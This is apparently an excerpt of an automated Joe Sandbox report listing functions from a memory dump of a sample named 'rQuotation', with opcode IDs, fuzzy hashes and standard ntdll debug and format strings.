                                                                                                                                                                                                                                                • Opcode ID: 49db845b08706029abfb9d92e362846e3c1a13a4fa89b597a5b330d034a7e378
                                                                                                                                                                                                                                                • Instruction ID: e244532fb0478c64c9901f820affdfc33eb2f3e4712012e5562e481337eb1a10
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 49db845b08706029abfb9d92e362846e3c1a13a4fa89b597a5b330d034a7e378
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7390023225580403D300715C4808747500597D1302F55C021A5164565EC765CA916632
                                                                                                                                                                                                                                                Function 01702F90 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 08fcc6c96870c8cd76dbaec2de142ec1af98ae2418995738c3ee95f0a43ff2c7
                                                                                                                                                                                                                                                • Instruction ID: f3631c2945548e386a015880297d9384a6d28bed747a3f4c7cfd5031a312b7f2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 08fcc6c96870c8cd76dbaec2de142ec1af98ae2418995738c3ee95f0a43ff2c7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0990023225580403D300715C481470B500597D1302F55C021A1164565DC7258A516672
                                                                                                                                                                                                                                                Function 01702E30 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: edab521d3d38c7531174f8e188a193b3678d96b159a9c3466a6b60902dce0ed7
                                                                                                                                                                                                                                                • Instruction ID: a5aaa1b595a504da5d1c09bfa4b2686b69884dd24569b5432dcc2588e598e8ae
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: edab521d3d38c7531174f8e188a193b3678d96b159a9c3466a6b60902dce0ed7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E290022235540403D302715C44146065009D7D2345F95C022E1424565DC7258B53A233
                                                                                                                                                                                                                                                Function 01702EE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: c703825325adb5301e8760ad39b5a481d262d67c40b44b2ba1836e86b9cd26a8
                                                                                                                                                                                                                                                • Instruction ID: 4dde3c8ae6eee957f82ea03c43f26b8a4bb481bf94b3cfd646905f6efa267eca
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c703825325adb5301e8760ad39b5a481d262d67c40b44b2ba1836e86b9cd26a8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DD90026225580403D340755C4804607500597D1302F55C021A2064565ECB298E516236
                                                                                                                                                                                                                                                Function 01702EA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 8ee78f4230269b9d28fc7374dcdc055c8b5a895a66c072aa0c35f13112a7b038
                                                                                                                                                                                                                                                • Instruction ID: b9f25b53c3a406ba4dc3f81f3d4cd6468b7fe7525cad29fc3a0893b470309144
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ee78f4230269b9d28fc7374dcdc055c8b5a895a66c072aa0c35f13112a7b038
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5490027225540403D340715C4404746500597D1301F55C021A5064564EC7598FD56766
                                                                                                                                                                                                                                                Function 01702E80 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: ce70a7ff661a29ef1bb2029b0acfb67e10032779708aef15e5e5b9a702a2cc82
                                                                                                                                                                                                                                                • Instruction ID: 1decb71bc1bdf632251ba2c54fb82f22cb2f51c71c1dbb8add2893da12c69c7e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ce70a7ff661a29ef1bb2029b0acfb67e10032779708aef15e5e5b9a702a2cc82
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2790022265540503D301715C4404616500A97D1241F95C032A1024565ECB258B92A232
                                                                                                                                                                                                                                                Function 01703010 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 29d88e55ebb69ec4c7121e11636fed63db8265b8807df57559be973794285031
                                                                                                                                                                                                                                                • Instruction ID: 3771644ca4d7abc84292c305984b522a4aa9a53033cb61c6c6b125a4e4a1d5b1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 29d88e55ebb69ec4c7121e11636fed63db8265b8807df57559be973794285031
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3690022225584443D340725C4804B0F910597E2202F95C029A4156564CCA158A555722
                                                                                                                                                                                                                                                Function 01703090 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 9eb36ddb6f916d02420e9d915c4c14a5d49c5f8725680935aba89f5e082b04f4
                                                                                                                                                                                                                                                • Instruction ID: 9d1edf20076fcb86d4e14e0e96317303b85e636904ba23e1a6ae49fde37cbdb4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9eb36ddb6f916d02420e9d915c4c14a5d49c5f8725680935aba89f5e082b04f4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A190022229540803D340715C84147075006D7D1601F55C021A0024564DC7168B6567B2
                                                                                                                                                                                                                                                Function 017039B0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 84be4aedb5789d572a0e82a56eff1b27484736fbe1df45213e168b79fbd008c0
                                                                                                                                                                                                                                                • Instruction ID: 0eb4e10249821cc755fa6163018101b034121de1f04a02fde2d773b2c0d44c52
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 84be4aedb5789d572a0e82a56eff1b27484736fbe1df45213e168b79fbd008c0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3690022229945103D350715C44046169005B7E1201F55C031A08145A4DC6558A556322
                                                                                                                                                                                                                                                Function 01702C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                                                                                                • Instruction ID: 8c8d2a8532fa79f53aeed060f0eea4f7f5c4c31bfb38124af97dc571d391115d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                Function 01702890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                                                                                • API String ID: 48624451-2108815105
                                                                                                                                                                                                                                                • Opcode ID: 955f6f1da59346620ae9d447e845d6b79abd195be36d5ff6ff33e631b4e8c4fc
                                                                                                                                                                                                                                                • Instruction ID: 6874d62ddd5ce998ebf621626c1bd5d31f1485d1a08a5b6ff9dbb5b86028968b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 955f6f1da59346620ae9d447e845d6b79abd195be36d5ff6ff33e631b4e8c4fc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0251D6B6A00216BFCB12DBAC889497EFBF8BB482407148269F595D7686D734DE4087A0
                                                                                                                                                                                                                                                Function 01772410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                                                                                • API String ID: 48624451-2108815105
                                                                                                                                                                                                                                                • Opcode ID: 19bd2b6a46e5a1fddc99faef9c3577b1a06abce78152c2b75e0dc13df9d5ada0
                                                                                                                                                                                                                                                • Instruction ID: 150b02da3da82f2b82a0dd6b01c645f2d848e7ebf7b02fe43275c02282b14c90
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 19bd2b6a46e5a1fddc99faef9c3577b1a06abce78152c2b75e0dc13df9d5ada0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AD51C475B00645AEDF30DE5CCC9097EFBB9AB44200F1488A9F5A6D7646EA74EE408760
                                                                                                                                                                                                                                                Function 016F7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 017346FC
                                                                                                                                                                                                                                                • ExecuteOptions, xrefs: 017346A0
                                                                                                                                                                                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01734725
                                                                                                                                                                                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 01734787
                                                                                                                                                                                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01734655
                                                                                                                                                                                                                                                • Execute=1, xrefs: 01734713
                                                                                                                                                                                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01734742
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                                                                                • API String ID: 0-484625025
                                                                                                                                                                                                                                                • Opcode ID: 2e5850394bbbab5c25150e90dbd98dee192f7c674b622cdeca6a657acafb8bce
                                                                                                                                                                                                                                                • Instruction ID: ac56f901d319606220db6d082155a99ca93998af69881b5b11a7a97336148deb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2e5850394bbbab5c25150e90dbd98dee192f7c674b622cdeca6a657acafb8bce
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D1510A31600229ABEF11ABA9DC89FBDB7A8EF59301F04009DD706A72D1E7719E458F50
                                                                                                                                                                                                                                                Function 01796940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                                                                                                                                                • Instruction ID: c29bcbe0718652c6e5ac80aa970863b7a729cd1a9d5bf21eb33232c2b4d57f8f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0A021571508342AFDB09CF18D494A6BFBE5FFC8700F148A2DB9995B264DB31E949CB42
                                                                                                                                                                                                                                                Function 0170B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: __aulldvrm
                                                                                                                                                                                                                                                • String ID: +$-$0$0
                                                                                                                                                                                                                                                • API String ID: 1302938615-699404926
                                                                                                                                                                                                                                                • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                                                                                                                                • Instruction ID: c5f609524d5e498246a13f15ffc72ef49d589222d33b9f8983ad9fdca10618ba
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E181BF78E45349CEEF2A8E6CC8907BEFBF1AF85320F18455AD861A72D1C7309B408B51
                                                                                                                                                                                                                                                Function 017720E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                                                                                • String ID: %%%u$[$]:%u
                                                                                                                                                                                                                                                • API String ID: 48624451-2819853543
                                                                                                                                                                                                                                                • Opcode ID: 19e8d5b0035e121cfdaebfa8aed0d65bafa506f3881f034882b0716a4b6419be
                                                                                                                                                                                                                                                • Instruction ID: 473af2c7c57747b052bfdb9703f5bdc90c15e39f11b6412adcbea89fb2708da8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 19e8d5b0035e121cfdaebfa8aed0d65bafa506f3881f034882b0716a4b6419be
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3A21B27AA00219ABDB11DF79DC44AFEFBF9FF54640F040126EA55E3245E730DA018BA0
                                                                                                                                                                                                                                                Function 016EF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • RTL: Re-Waiting, xrefs: 0173031E
                                                                                                                                                                                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 017302BD
                                                                                                                                                                                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 017302E7
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                                                                                                • API String ID: 0-2474120054
                                                                                                                                                                                                                                                • Opcode ID: c4a59b6437c5e4f2b1c2909e73c7e556da1c0ab23fcd6b9f0f7231fb3f13a26e
                                                                                                                                                                                                                                                • Instruction ID: a852074abdf8ffe8f14eaaebff7a0e38b7772d0f34e8c9ad57c8e443e950b85a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c4a59b6437c5e4f2b1c2909e73c7e556da1c0ab23fcd6b9f0f7231fb3f13a26e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 98E1BE71609741DFEB25CF28C888B2ABBE0BB84314F140AADF5A58B3D2D775D945CB42
                                                                                                                                                                                                                                                Function 016FB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0173728C
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01737294
                                                                                                                                                                                                                                                • RTL: Resource at %p, xrefs: 017372A3
                                                                                                                                                                                                                                                • RTL: Re-Waiting, xrefs: 017372C1
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                                                                                • API String ID: 885266447-605551621
                                                                                                                                                                                                                                                • Opcode ID: 50bc2dd5042359406d4b78c83f01758878650ace5c014d45087f56d28e08d959
                                                                                                                                                                                                                                                • Instruction ID: ccf52d0a4e73937e22cdafc7c1b2da4588c7973885c981dc3e3b4b4b1cc261ce
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 50bc2dd5042359406d4b78c83f01758878650ace5c014d45087f56d28e08d959
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D0410072709202ABD725CE29CC41F6AF7B5FF94710F10061DFA55AB281DB31E8428BD1
                                                                                                                                                                                                                                                Function 01772300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                                                                                • String ID: %%%u$]:%u
                                                                                                                                                                                                                                                • API String ID: 48624451-3050659472
                                                                                                                                                                                                                                                • Opcode ID: 933612243e7b11f7edb8dd297be237ec9f617b8f7a411d644c0d6d571654d073
                                                                                                                                                                                                                                                • Instruction ID: 6d22ab17c36a3d28d673b65f9dd0d7160203964a9768f16a98efe98034aa5ae0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 933612243e7b11f7edb8dd297be237ec9f617b8f7a411d644c0d6d571654d073
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 55319372A00219AFDF20DF2DCC44BEEF7F8EF44610F55455AE959E3245EB30AA448BA0
                                                                                                                                                                                                                                                Function 016C9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: $$@
                                                                                                                                                                                                                                                • API String ID: 0-1194432280
                                                                                                                                                                                                                                                • Opcode ID: 72c6f29c4ad3643ef488bf497312b91d94dec1e4d7810e389c0dc1ef28023bdd
                                                                                                                                                                                                                                                • Instruction ID: 72ad9e140748aef742ada4f952e076c689b7f664231b5fb6b5a51e03885ddd43
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 72c6f29c4ad3643ef488bf497312b91d94dec1e4d7810e389c0dc1ef28023bdd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 59812C72D002699BDB31CB54CC45BEEBBB4AF48714F0041DAEA19B7640D7709E85CFA4